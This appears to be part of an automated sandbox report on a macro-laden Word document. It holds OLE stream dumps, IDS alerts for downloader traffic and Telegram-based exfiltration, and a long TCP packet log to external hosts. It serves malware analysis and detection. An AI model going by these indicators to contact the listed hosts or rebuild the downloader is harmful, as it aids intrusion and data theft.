                                                                                                                                                                        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                                        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:2910
                                                                                                                                                                        Entropy:4.347456610716895
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                                                                                                                                                                        Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                        Stream Path: Macros/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:VAX-order 68k Blit mpx/mux executable
                                                                                                                                                                        Stream Size:522
                                                                                                                                                                        Entropy:6.270795228511715
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . . m . . A ! O f f i c g O D . f . i . c g
                                                                                                                                                                        Data Raw:01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1c d7 8d 69 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                                                                                        Stream Path: WordDocument, File Type: data, Stream Size: 17972
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:WordDocument
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:17972
                                                                                                                                                                        Entropy:4.458555026314971
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. Y . . . . . . . . . . . . . . . . . . . . H . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . 4 F . . 9 . \\ 9 . \\ . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . . . . . . . . . . . . . i . . . . . . . i . . . . . . . i . . . 8 . . . . . . 4 . . . . . . . . . i . . . . . . . . . . 0 . .
                                                                                                                                                                        Data Raw:ec a5 c1 00 59 e0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 48 11 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 46 00 00 39 a3 0a 5c 39 a3 0a 5c 1d 09 00 00 00 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2025-01-06T07:53:18.199849+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744166.62.27.188443TCP
                                                                                                                                                                        2025-01-06T07:53:26.185701+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:27.495502+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449753158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:27.933122+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449755188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:28.592083+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449756158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:30.961117+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449759188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:32.919827+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449762188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:34.524984+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449764188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:36.797073+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449768188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:37.614845+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449767158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:39.114951+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449767158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:39.678729+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449776188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:40.308163+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449779158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:40.506357+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449778149.154.167.220443TCP
                                                                                                                                                                        2025-01-06T07:53:40.913383+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449780188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:42.711030+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449783188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:44.665578+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449786158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:46.009341+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449786158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:46.590984+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449791188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:48.430076+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449795188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:48.681290+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449794158.101.44.24280TCP
                                                                                                                                                                        2025-01-06T07:53:49.287543+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449798188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:50.496870+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449802188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:53:52.312826+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449805149.154.167.220443TCP
                                                                                                                                                                        2025-01-06T07:53:53.209273+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449806188.114.96.3443TCP
                                                                                                                                                                        2025-01-06T07:54:00.405289+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449818149.154.167.220443TCP

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 6, 2025 07:53:14.666408062 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:14.671257019 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:14.671330929 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:14.671390057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:14.676199913 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.192961931 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.192986965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.193001986 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.193022013 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.193037033 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.193051100 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.193064928 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.193114042 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.232055902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232072115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232093096 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232108116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232121944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232142925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232156992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232171059 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.232261896 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.232291937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279531956 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279561043 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279581070 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279624939 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279725075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279750109 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279764891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279793024 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279808044 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279819012 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.279829025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.279863119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.280615091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280630112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280643940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.280683041 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318684101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318720102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318734884 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318773985 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318803072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.318881035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318897009 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318911076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.318937063 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319005966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319036007 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319075108 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319777012 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319798946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319829941 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319844007 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319847107 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319861889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.319865942 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.319900036 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.320557117 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366307020 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366338968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366354942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366377115 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366394997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366413116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366429090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366477966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.366808891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366832018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366847992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.366872072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367172956 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367198944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367216110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367218971 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367230892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367247105 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367250919 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367286921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.367945910 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367960930 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367975950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367996931 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.367999077 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368011951 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368037939 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368751049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368766069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368788004 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.368813992 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.368838072 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405481100 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405512094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405524969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405540943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405563116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405606985 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405646086 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405910015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405925989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405940056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405955076 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405970097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.405977964 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.405994892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406037092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.406826973 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406841993 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406856060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406868935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406874895 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.406888962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.406908989 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407665014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407680035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407701969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407710075 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407717943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407732964 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.407744884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.407774925 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.408473969 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408488989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408503056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408525944 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.408571959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.408621073 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.450299025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450315952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450330019 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.450500011 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453119040 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453134060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453146935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453190088 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453198910 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453211069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453226089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453239918 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453260899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453264952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453309059 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453347921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453618050 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453632116 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453646898 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453660011 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453685045 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.453855038 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453902960 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453916073 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.453942060 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454027891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454041958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454056025 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454068899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454077959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454092026 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454093933 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454133034 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454847097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454860926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454876900 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454901934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454910040 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454916000 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454930067 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454938889 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454945087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.454962015 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.454981089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.455028057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492353916 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492386103 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492408991 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492424011 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492449999 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492480040 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492556095 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492572069 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492587090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492602110 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492623091 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492640018 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492722034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492736101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492750883 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492764950 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492779970 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.492788076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.492813110 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.493524075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493537903 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493554115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493576050 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493590117 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493592978 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.493606091 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493621111 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.493629932 CET4973980192.168.2.4147.124.216.113
